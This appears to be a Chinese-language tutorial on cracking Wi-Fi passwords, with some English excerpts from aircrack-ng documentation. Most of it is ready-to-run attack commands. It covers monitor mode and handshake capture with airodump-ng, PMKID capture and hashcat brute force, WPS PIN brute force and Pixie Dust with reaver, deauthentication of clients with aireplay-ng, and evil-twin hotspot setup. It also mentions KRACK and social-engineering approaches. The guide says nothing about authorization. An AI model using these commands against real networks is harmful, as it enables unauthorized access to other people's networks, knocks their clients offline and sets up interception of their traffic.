开启网卡监听
使用下面命令对网卡开启监听模式:
# airmon-ng <start|stop|check> <interface>
sudo airmon-ng start <interface>
扫描周围WIFI信息
使用下面命令对周边wifi进行探测:
sudo airodump-ng <interface>
抓取握手包
选择一个信号较好(PWR值大的)的热点,防止信号不好影响捕获到握手包
# airodump-ng -c chanel --bssid <bssid> -w <pcap> <interface>
sudo airodump-ng -c 6 --bssid 9E:7F:81:48:6B:0E -w hidden wlx00224369f3a1
没有客户端连接
这里没有客户端进行连接,因为WPA/WPA2不能使用fake authentication攻击,虽然也能成功执行命令伪造连接,但是无意义。
There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.
有个图很好的展示了WPA加密的难度
参考:https://www.aircrack-ng.org/doku.php?id=cracking_wpa https://sharkfest.wireshark.org/retrospective/sfus/presentations12/MB-6_Introduction_to_WiFi_Security_and_Aircrack-ng.pdf
对于没有客户端连接的情况,可以尝试下面的方案:
PMKID attack
PMKSA = PMKID + Lifetime of PMK + MAC addresses + other variables PMKID = HMAC-SHA1-128(PMK, “PMK Name” + MAC (AP) + MAC(Supplicant))
步骤
使用hcxdumptool去捕获PMKID 安装
sudo apt install hcxtools
捕获(网卡开启混杂/监听模式)
sudo hcxdumptool -i <interface> -o <dump file> --enable_status=<digit>
# enable real-time display (waterfall) only incoming traffic
# each message is displayed only once at the first occurrence to avoid spamming the real-time display
# bitmask:
# 0: no status (default)
# 1: EAPOL
# 2: ASSOCIATION and REASSOCIATION
# 4: AUTHENTICATION
# 8: BEACON and PROBERESPONSE
# 16: ROGUE AP
# 32: GPS (once a minute)
# 64: internal status (once a minute)
# ...
# example: show everything but don't run as server or client (1+2+4+8+16 = 31)
# show only EAPOL and ASSOCIATION and REASSOCIATION (1+2 = 3)
对于想捕获单个PMKID可以使用过滤命令
sudo hcxdumptool -i <interface> -o <dump file> --enable_status=1 --filterlist_ap=target --filtermode=2
转换使用命令转换为hashcat可识别的哈希
hcxpcaptool -o hash.hc22000 <file>
使用hashcat进行爆破
hashcat -m 16800 --force <pmkidhash> <dict> --show
参考:https://www.hackingarticles.in/wireless-penetration-testing-pmkid-attack/
PIN爆破
一些路由器默认开启了pin功能,只需要爆破到8位pin值,即可获取到密码。pin由三个部分组成1-4、5-7、8 前四位和中间三位无关系,最后一位为校验值。理论上最多爆破11000次即可出结果。但是现在路由器都具有了防pin功能,导致尝试几次就会锁死pin功能。
安装软件
sudo apt install reaver
使用reaver爆破
使用命令查看是否开启WPS和锁定
sudo wash -i <interface>
sudo reaver -i <interface> -c <channel> --b <bssid> -vv
- The current specification of the Wi-Fi Protected Setup specification (version 2.0.8) has specific recommendations for implementers of the protocol to protect against brute force attacks of the PIN.
离线爆破pin
另外,对于无线芯片存在缺陷的(Pixie Dust vulnerability),可以在命令后面加入-K 1实现离线计算pin值。影响范围:
受影响芯片厂商主要为 Broadcom(博通)部分型号、Realtek(瑞昱)、Ralink(雷凌,联发科旗下)、MediaTek(联发科)、Celeno等。
- 注意:Realtek 在 2016 年修复了该漏洞。
效果如下,虽然是个失败的:
字典爆破
使用密码字典进行穷举爆破,最后的无奈办法。
存在客户端连接
deauth attack
如果有客户端连接可以发送deauth包(强制客户端下线,重新连接网络)捕获到握手包。
sudo aireplay-ng --deauth <count> -a <bssid> -c <client mac> <interface>
evil twin attack
使用命令配置无线网ssid,开启twin热点
sudo airbase-ng -e <ssid> -c <channel> <interface>
开启ip转发、流量代理、启用MITM、钓鱼等。
参考:https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
KRACK 中间人攻击
通过创建同ssid 和同bssid (信道不同),发送切换信道广播达到中间人目的。脆弱性目标:Linux 和 Android 6.0 或更高版本脚本:https://github.com/vanhoefm/krackattacks-scripts
社会工程学
- 敲门直接问
- wifi钓鱼
- 。。。